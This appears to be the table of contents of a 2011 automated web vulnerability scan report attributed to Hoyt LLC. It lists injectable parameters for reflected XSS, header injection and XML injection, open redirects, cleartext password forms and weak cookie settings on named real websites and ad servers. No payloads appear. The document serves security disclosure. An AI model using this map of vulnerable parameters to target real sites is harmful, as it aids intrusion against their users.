XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05152011-05

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Sun May 15 15:16:33 CDT 2011.


Loading


1. SQL injection

2. LDAP injection

3. HTTP header injection

3.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

3.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

3.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

4. Cross-site scripting (reflected)

4.1. http://choices.truste.com/ca [c parameter]

4.2. http://choices.truste.com/ca [cid parameter]

4.3. http://choices.truste.com/ca [name of an arbitrarily supplied request parameter]

4.4. http://choices.truste.com/ca [plc parameter]

4.5. http://choices.truste.com/ca [zi parameter]

4.6. https://console.iservices.net.nz/ [name of an arbitrarily supplied request parameter]

4.7. https://idm.net.nz/secure/ [name of an arbitrarily supplied request parameter]

4.8. https://idm.net.nz/secure/index.php [name of an arbitrarily supplied request parameter]

4.9. https://secure.tagged.com/secure_login.html [loc parameter]

4.10. https://secure.tagged.com/secure_login.html [name of an arbitrarily supplied request parameter]

4.11. https://secure.tagged.com/secure_login.html [uri parameter]

4.12. https://secure.tagged.com/secure_login.html [ver parameter]

4.13. http://tweetbeat.com/favicon.ico [REST URL parameter 1]

4.14. http://www.kosmix.com/ [name of an arbitrarily supplied request parameter]

4.15. http://www.kosmix.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

4.16. http://www.kosmix.com/images/ck.txt [REST URL parameter 2]

4.17. http://www.kosmix.com/images/favicon.ico [REST URL parameter 2]

4.18. http://www.kosmix.com/images/pv.txt [REST URL parameter 1]

4.19. http://www.kosmix.com/javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]

4.20. http://www.kosmix.com/javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]

4.21. http://www.kosmix.com/javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]

4.22. http://www.kosmix.com/javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]

4.23. http://www.kosmix.com/javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]

4.24. http://www.kosmix.com/javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]

4.25. http://www.kosmix.com/javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]

4.26. http://www.kosmix.com/javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]

4.27. http://www.kosmix.com/javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js [REST URL parameter 1]

4.28. http://www.kosmix.com/javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js [REST URL parameter 2]

4.29. http://www.kosmix.com/javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js [REST URL parameter 2]

4.30. http://www.kosmix.com/stylesheets/cache/topic-s_kosmix-chimborazo-152138.css [REST URL parameter 1]

4.31. http://www.kosmix.com/stylesheets/cache/topic-s_kosmix-chimborazo-152138.css [REST URL parameter 2]

4.32. http://www.kosmix.com/stylesheets/cache/topic-s_kosmix-chimborazo-152138.css [REST URL parameter 2]

4.33. http://www.kosmix.com/stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css [REST URL parameter 1]

4.34. http://www.kosmix.com/stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css [REST URL parameter 2]

4.35. http://www.kosmix.com/stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css [REST URL parameter 2]

4.36. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]

4.37. http://www.orcon.net.nz/address_locator/=&type=orconatwork [name of an arbitrarily supplied request parameter]

4.38. http://www.righthealth.com/ [name of an arbitrarily supplied request parameter]

4.39. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 1]

4.40. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

4.41. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

4.42. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

4.43. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]

4.44. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]

4.45. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]

4.46. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 3]

4.47. http://www.righthealth.com/javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]

4.48. http://www.righthealth.com/javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]

4.49. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 1]

4.50. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]

4.51. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]

4.52. http://www.righthealth.com/javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]

4.53. http://www.righthealth.com/javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js [REST URL parameter 2]

4.54. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js [REST URL parameter 2]

4.55. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js [REST URL parameter 2]

4.56. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-chimborazo-153574.css [REST URL parameter 2]

4.57. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-chimborazo-153574.css [REST URL parameter 2]

4.58. http://www.tagged.com/api/ [data parameter]

4.59. http://www.tagged.com/api/ [data parameter]

4.60. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]

4.61. http://www.kosmix.com/ [User-Agent HTTP header]

4.62. http://www.righthealth.com/ [User-Agent HTTP header]

5. Flash cross-domain policy

5.1. http://a.dlqm.net/crossdomain.xml

5.2. http://ad.doubleclick.net/crossdomain.xml

5.3. http://ads.pointroll.com/crossdomain.xml

5.4. http://ajax.googleapis.com/crossdomain.xml

5.5. http://amch.questionmarket.com/crossdomain.xml

5.6. http://api.facebook.com/crossdomain.xml

5.7. http://b.scorecardresearch.com/crossdomain.xml

5.8. http://bh.contextweb.com/crossdomain.xml

5.9. http://bs.serving-sys.com/crossdomain.xml

5.10. http://c.betrad.com/crossdomain.xml

5.11. http://c5.zedo.com/crossdomain.xml

5.12. http://c7.zedo.com/crossdomain.xml

5.13. https://console.iservices.net.nz/crossdomain.xml

5.14. http://ds.serving-sys.com/crossdomain.xml

5.15. http://ib.adnxs.com/crossdomain.xml

5.16. http://l.betrad.com/crossdomain.xml

5.17. http://log30.doubleverify.com/crossdomain.xml

5.18. http://m.adnxs.com/crossdomain.xml

5.19. http://pixel.quantserve.com/crossdomain.xml

5.20. http://r1-ads.ace.advertising.com/crossdomain.xml

5.21. http://r1.zedo.com/crossdomain.xml

5.22. http://s3.amazonaws.com/crossdomain.xml

5.23. http://segment-pixel.invitemedia.com/crossdomain.xml

5.24. http://speed.pointroll.com/crossdomain.xml

5.25. http://t.mookie1.com/crossdomain.xml

5.26. http://tcr.tynt.com/crossdomain.xml

5.27. http://vtr.com/crossdomain.xml

5.28. http://webmail.vtr.net/crossdomain.xml

5.29. http://www.kol.co.nz/crossdomain.xml

5.30. http://www.kosmix.com/crossdomain.xml

5.31. http://www.righthealth.com/crossdomain.xml

5.32. http://api.tweetmeme.com/crossdomain.xml

5.33. http://cookex.amp.yahoo.com/crossdomain.xml

5.34. http://feeds.bbci.co.uk/crossdomain.xml

5.35. http://googleads.g.doubleclick.net/crossdomain.xml

5.36. http://newsrss.bbc.co.uk/crossdomain.xml

5.37. http://player.ooyala.com/crossdomain.xml

5.38. http://pubads.g.doubleclick.net/crossdomain.xml

5.39. https://secure-static.tagged.com/crossdomain.xml

5.40. http://secure.tagged.com/crossdomain.xml

5.41. https://secure.tagged.com/crossdomain.xml

5.42. http://www.facebook.com/crossdomain.xml

5.43. http://www.tagged.com/crossdomain.xml

5.44. http://www.orcon.net.nz/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://ads.pointroll.com/clientaccesspolicy.xml

6.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.4. http://player.ooyala.com/clientaccesspolicy.xml

6.5. http://speed.pointroll.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://webmail.vtr.net/

7.2. http://webmail.vtr.net/

7.3. http://www.kol.co.nz/account.php

7.4. http://www.kol.co.nz/payment/credit.php

7.5. http://www.kol.co.nz/webmail.php

8. XML injection

8.1. http://api.facebook.com/restserver.php [format parameter]

8.2. http://platform.twitter.com/anywhere.js [REST URL parameter 1]

8.3. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

8.4. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

8.5. http://s3.amazonaws.com/tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg [REST URL parameter 1]

8.6. http://s3.amazonaws.com/tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg [REST URL parameter 2]

8.7. http://s3.amazonaws.com/tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg [REST URL parameter 3]

8.8. http://s3.amazonaws.com/tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg [REST URL parameter 4]

8.9. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg [REST URL parameter 1]

8.10. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg [REST URL parameter 2]

8.11. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg [REST URL parameter 3]

8.12. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17566/cannes%20group.jpg [REST URL parameter 4]

8.13. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg [REST URL parameter 1]

8.14. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg [REST URL parameter 2]

8.15. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg [REST URL parameter 3]

8.16. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17596/Giants%20ross%20back.jpg [REST URL parameter 4]

8.17. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg [REST URL parameter 1]

8.18. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg [REST URL parameter 2]

8.19. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg [REST URL parameter 3]

8.20. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17602/cards%20rasmus.jpg [REST URL parameter 4]

8.21. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg [REST URL parameter 1]

8.22. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg [REST URL parameter 2]

8.23. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg [REST URL parameter 3]

8.24. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg [REST URL parameter 4]

8.25. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg [REST URL parameter 1]

8.26. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg [REST URL parameter 2]

8.27. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg [REST URL parameter 3]

8.28. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg [REST URL parameter 4]

8.29. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg [REST URL parameter 1]

8.30. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg [REST URL parameter 2]

8.31. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg [REST URL parameter 3]

8.32. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg [REST URL parameter 4]

8.33. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg [REST URL parameter 1]

8.34. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg [REST URL parameter 2]

8.35. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg [REST URL parameter 3]

8.36. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg [REST URL parameter 4]

8.37. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg [REST URL parameter 1]

8.38. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg [REST URL parameter 2]

8.39. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg [REST URL parameter 3]

8.40. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg [REST URL parameter 4]

8.41. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg [REST URL parameter 1]

8.42. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg [REST URL parameter 2]

8.43. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg [REST URL parameter 3]

8.44. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17660/AP110429160259.jpg [REST URL parameter 4]

8.45. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg [REST URL parameter 1]

8.46. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg [REST URL parameter 2]

8.47. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg [REST URL parameter 3]

8.48. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17661/AP11050105364.jpg [REST URL parameter 4]

8.49. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg [REST URL parameter 1]

8.50. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg [REST URL parameter 2]

8.51. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg [REST URL parameter 3]

8.52. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17665/AP110514120499.jpg [REST URL parameter 4]

8.53. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg [REST URL parameter 1]

8.54. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg [REST URL parameter 2]

8.55. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg [REST URL parameter 3]

8.56. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17680/AP_posada.jpg [REST URL parameter 4]

8.57. http://tcr.tynt.com/javascripts/Tracer.js [REST URL parameter 1]

8.58. http://tcr.tynt.com/javascripts/Tracer.js [REST URL parameter 2]

8.59. http://trk.cetrk.com/s [REST URL parameter 1]

8.60. http://trk.cetrk.com/t.js [REST URL parameter 1]

8.61. http://www.kol.co.nz/css/ie_hacks.css [REST URL parameter 1]

8.62. http://www.kol.co.nz/css/ie_hacks.css [REST URL parameter 2]

8.63. http://www.kol.co.nz/css/print.css [REST URL parameter 1]

8.64. http://www.kol.co.nz/css/print.css [REST URL parameter 2]

8.65. http://www.kol.co.nz/css/stylev1.53.css [REST URL parameter 1]

8.66. http://www.kol.co.nz/css/stylev1.53.css [REST URL parameter 2]

8.67. http://www.kol.co.nz/js/domfunction.js [REST URL parameter 1]

8.68. http://www.kol.co.nz/js/domfunction.js [REST URL parameter 2]

8.69. http://www.kol.co.nz/js/utils.js [REST URL parameter 1]

8.70. http://www.kol.co.nz/js/utils.js [REST URL parameter 2]

8.71. http://www.kosmix.com/c-javascripts/kapp_relevance.js [REST URL parameter 1]

8.72. http://www.kosmix.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

8.73. http://www.kosmix.com/images/ck.txt [REST URL parameter 1]

8.74. http://www.kosmix.com/images/ck.txt [REST URL parameter 2]

8.75. http://www.kosmix.com/images/favicon.ico [REST URL parameter 1]

8.76. http://www.kosmix.com/images/favicon.ico [REST URL parameter 2]

8.77. http://www.kosmix.com/images/mpv.txt [REST URL parameter 1]

8.78. http://www.kosmix.com/images/mpv.txt [REST URL parameter 2]

8.79. http://www.kosmix.com/images/pv.txt [REST URL parameter 1]

8.80. http://www.kosmix.com/images/pv.txt [REST URL parameter 2]

8.81. http://www.kosmix.com/javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]

8.82. http://www.kosmix.com/javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]

8.83. http://www.kosmix.com/javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]

8.84. http://www.kosmix.com/javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js [REST URL parameter 1]

8.85. http://www.kosmix.com/stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css [REST URL parameter 1]

8.86. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 1]

8.87. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

8.88. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 1]

8.89. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]

8.90. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 3]

8.91. http://www.righthealth.com/javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 1]

8.92. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 1]

8.93. http://www.righthealth.com/javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js [REST URL parameter 1]

8.94. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js [REST URL parameter 1]

9. SSL cookie without secure flag set

9.1. https://console.iserve.net.nz/webmail/src/login.php

9.2. https://console.iservices.net.nz/

9.3. https://mail.orcon.net.nz/portal/login.php

9.4. https://secure.tagged.com/secure_login.html

10. Session token in URL

10.1. http://bh.contextweb.com/bh/set.aspx

10.2. https://secure.tagged.com/secure_login.html

10.3. http://www.tagged.com/api/

11. SSL certificate

11.1. https://clicktale.pantherssl.com/

11.2. https://d2s.iserve.net.nz:8443/

11.3. https://console.iserve.net.nz/

11.4. https://console.iservices.net.nz/

11.5. https://idm.net.nz/

11.6. https://mail.orcon.net.nz/

11.7. https://orcres.cosmos.net.nz/

11.8. https://portal.bizoservices.com/

11.9. https://secure-static.tagged.com/

11.10. https://secure.tagged.com/

12. Open redirection

12.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ru parameter]

12.2. http://cmap.am.ace.advertising.com/amcm.ashx [admeld_callback parameter]

12.3. https://orcres.cosmos.net.nz/orconmembersarea.php [failureurl parameter]

13. Cookie scoped to parent domain

13.1. http://t.mookie1.com/t/v1/imp

13.2. http://www.opensource.org/licenses/gpl-license.php

13.3. http://www.opensource.org/licenses/mit-license.php

13.4. http://ads.pointroll.com/PortalServe/

13.5. http://amch.questionmarket.com/adscgen/sta.php

13.6. http://b.scorecardresearch.com/b

13.7. http://b.scorecardresearch.com/p

13.8. http://bh.contextweb.com/bh/set.aspx

13.9. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

13.10. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp

13.11. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

13.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.14. http://c7.zedo.com/bar/v16-406/c5/jsc/gl.js

13.15. http://cms.ad.yieldmanager.net/v1/cms

13.16. http://code.google.com/p/swfobject/

13.17. http://cookex.amp.yahoo.com/v2/cexposer/SIG=13ahi2098/*http%3A//cms.ad.yieldmanager.net/v1/cms

13.18. http://ib.adnxs.com/getuid

13.19. http://ib.adnxs.com/seg

13.20. http://ic.tynt.com/b/p

13.21. http://m.adnxs.com/msftcookiehandler

13.22. http://pixel.quantserve.com/pixel

13.23. http://pixel.rubiconproject.com/tap.php

13.24. http://r1-ads.ace.advertising.com/ctst=1/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.25. http://r1-ads.ace.advertising.com/ctst=1/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.26. http://r1-ads.ace.advertising.com/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.27. http://r1-ads.ace.advertising.com/site=705487/size=300250/u=2/bnum=43626829/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.28. http://r1-ads.ace.advertising.com/site=776691/size=300250/u=2/bnum=24438061/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.29. http://r1-ads.ace.advertising.com/site=776691/size=300250/u=2/bnum=28476770/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.30. http://r1-ads.ace.advertising.com/site=776691/size=300250/u=2/bnum=92522527/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions

13.31. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=11211453/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html

13.32. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=12741032/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html

13.33. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=24692193/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions

13.34. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=28905079/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.35. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=36738221/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.36. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=37579081/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html

13.37. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=42928792/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html%253Ftopic%253Dreport-abuse

13.38. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=44415793/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F

13.39. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=49573366/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fsafety.html

13.40. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=58838557/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.41. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=68130074/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fbrowse.html

13.42. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=69569526/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html

13.43. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

13.44. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=81707588/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Ffind_groups.html

13.45. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=94465860/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F

13.46. http://secure.tagged.com/

13.47. https://secure.tagged.com/secure_login.html

13.48. http://segment-pixel.invitemedia.com/pixel

14. Cookie without HttpOnly flag set

14.1. https://console.iserve.net.nz/webmail/src/login.php

14.2. https://console.iservices.net.nz/

14.3. https://portal.bizoservices.com/

14.4. http://signup.kol.co.nz/customers/Calling_bundle_promotion.asp

14.5. http://t.mookie1.com/t/v1/imp

14.6. http://tag.admeld.com/match

14.7. http://vtr.com/productos/principal/packs/index.php

14.8. http://www.benjaminsterling.com/experiments/jqShuffle/

14.9. http://www.mathias-bank.de/

14.10. http://www.opensource.org/licenses/gpl-license.php

14.11. http://www.opensource.org/licenses/mit-license.php

14.12. http://www.orcon.net.nz/athome.php

14.13. http://www.orcon.net.nz/atwork.php

14.14. http://www.orcon.net.nz/home/rural/

14.15. http://www.orcon.net.nz/mobile/broadband-plans

14.16. http://www.orcon.net.nz/mobile/broadband-plans/upgrade

14.17. http://www.orcon.net.nz/mobile/handsets

14.18. http://www.orcon.net.nz/mobile/plans

14.19. http://www.orcon.net.nz/mobile/plans/upgrade

14.20. http://www.orcon.net.nz/work/business_hosting

14.21. http://www.orcon.net.nz/work/business_internet

14.22. http://ad.yieldmanager.com/pixel

14.23. http://ads.pointroll.com/PortalServe/

14.24. http://amch.questionmarket.com/adscgen/sta.php

14.25. http://b.scorecardresearch.com/b

14.26. http://b.scorecardresearch.com/p

14.27. http://bh.contextweb.com/bh/set.aspx

14.28. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

14.29. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp

14.30. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

14.31. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

14.32. http://bs.serving-sys.com/BurstingPipe/adServer.bs

14.33. http://bs.serving-sys.com/BurstingPipe/adServer.bs

14.34. http://c7.zedo.com/bar/v16-406/c5/jsc/gl.js

14.35. http://cms.ad.yieldmanager.net/v1/cms

14.36. http://code.google.com/p/swfobject/

14.37. http://console.iserve.net.nz/

14.38. http://cookex.amp.yahoo.com/v2/cexposer/SIG=13ahi2098/*http%3A//cms.ad.yieldmanager.net/v1/cms

14.39. http://help.tagged.com/index.php/report-abuse.html

14.40. http://hits.e.cl/cert/hit.dll

14.41. http://ic.tynt.com/b/p

14.42. http://kosmix.com/

14.43. https://mail.orcon.net.nz/portal/login.php

14.44. http://pixel.quantserve.com/pixel

14.45. http://pixel.rubiconproject.com/tap.php

14.46. http://r1-ads.ace.advertising.com/ctst=1/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

